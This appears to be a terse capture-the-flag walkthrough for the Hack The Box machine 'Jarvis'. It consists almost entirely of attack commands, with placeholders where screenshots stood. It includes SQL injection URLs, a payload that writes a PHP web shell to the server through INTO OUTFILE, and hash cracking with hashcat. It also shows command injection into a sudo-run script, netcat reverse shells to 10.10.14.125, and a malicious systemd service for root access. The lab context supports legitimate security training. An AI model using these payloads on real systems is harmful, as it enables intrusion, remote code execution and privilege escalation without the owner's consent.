echo "10.129.203.177 jarvis.htb" | sudo tee -a /etc/hosts

nmap -p- --open -T5 -v -n 10.129.203.177

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.203.177 -oG allPorts

extractPorts allPorts

nmap -sCV -p80,443 10.129.203.177 -oN targeted

Pasted image 20210826143718.png

Pasted image 20210826143945.png

http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,version(),3,4,5,6,7
http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,group_concat(user,0x3a,file_priv),3,4,5,6,7%20from%20mysql.user

Pasted image 20210826144751.png

Pasted image 20210826144835.png

Pasted image 20210826145119.png

Pasted image 20210826145156.png

Pasted image 20210826145728.png

Pasted image 20210826145832.png

Pasted image 20210826150740.png

Pasted image 20210826152523.png

http://10.129.203.177/room.php?cod=0%20UNION%20SELECT%201,%22%3C?php %20echo%20system($_REQUEST[%27test%27]);%20?%3E%22,3,4,5,6,7%20into %20outfile%20%27/var/www/html/shell.php%27

Pasted image 20210826153245.png

hashcat --examples-hashes | grep -i "sha1"

hashcat -m 300 -a 0 hash /usr/share/wordlists/rockyou.txt

nmap --script http-enum -p80 10.129.203.177 -oN ../nmap/webScan

Pasted image 20210827122609.png

Corremos linEnum.sh

Pasted image 20210827115443.png

sudo -l

Pasted image 20210827122107.png

python simpler.py -p

Pasted image 20210827121958.png

'10.10.14.125'

Pasted image 20210827122050.png

nc -lvnp 443

echo "nc -e /bin/sh 10.10.14.125 443" > /tmp/shell.sh

sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Pasted image 20210827122216.png

$(bash /tmp/shell.sh)

nc -lvnp 443

Pasted image 20210827122436.png

echo '[Service] 
>Type=notify 
>ExecStart=/bin/sh -c "nc -e /bin/bash 10.10.14.125 443" 
>KillMode=process >Restart=on-faillure 
>RestartSec=42s 
>[Install] 
>WantedBy=multi-user.target' > new.service 
systemctl link /home/pepper/new.service
systemctl start new

Pasted image 20210827122708.png

nc -lvnp 443

Pasted image 20210827122816.png

boxes

copyright©2022 Cu3rv0x all rights reserved